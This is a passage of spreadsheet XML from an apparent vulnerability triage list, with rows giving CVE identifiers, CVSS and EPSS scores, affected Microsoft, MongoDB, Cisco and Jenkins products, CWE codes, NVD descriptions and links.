        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K186"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86" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K187"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87" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K189"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89" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K190"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190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K191"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91" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K193"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93" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20248</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the DNS over TCP implementation of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the TCP DNS&amp;nbsp;response handler to unexpectedly restart, causing the device to reload.
This vulnerability is due to a logic error when parsing a DNS query and tracking the size of the incoming buffers. An attacker could exploit this vulnerability by formatting a crafted reply to a DNS query sent from the targeted device. A successful exploit could allow the attacker to cause the device to reload, causing a denial of service (DoS) condition.
Note: The attacker must be able to respond to DNS queries from the device, either by controlling the DNS service or through a machine-in-the-middle attack.</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20248</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69490</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K197"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97" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77892</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K198"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98" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
      <c r="Q198" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92140</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr"/>
      <c r="Q199" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>Jenkins Gitee Plugin 1301.v8957053c7902 and earlier does not escape the sender name from Gitee push webhook payloads in build causes, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to trigger builds via the Jenkins Gitee Plugin webhook endpoint.</t>
        </is>
      </c>
      <c r="S199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92140</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69469</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr"/>
      <c r="Q200" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20283</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr"/>
      <c r="Q201" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the IPsec Open API endpoint of Cisco ISE could allow an authenticated, remote attacker to inject arbitrary commands on the underlying operating system.&amp;nbsp;
This vulnerability is due to insufficient validation of user-supplied input in IPsec Open API calls. An attacker could exploit this vulnerability by sending crafted input to the IPsec Open API endpoint on an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system.&amp;nbsp;
To exploit this vulnerability, the attacker must have valid administrative credentials and the node must have more than one network interface, one of which must be configured as an active IPsec tunnel.
Note: For CVE-2026-20283, Cisco has assigned a Security Impact Rating (SIR) of High rather than Medium as the score indicates. The reason is that it is easy to get to root from the achieved privilege level.</t>
        </is>
      </c>
      <c r="S201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20283</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20287</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr"/>
      <c r="Q202" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
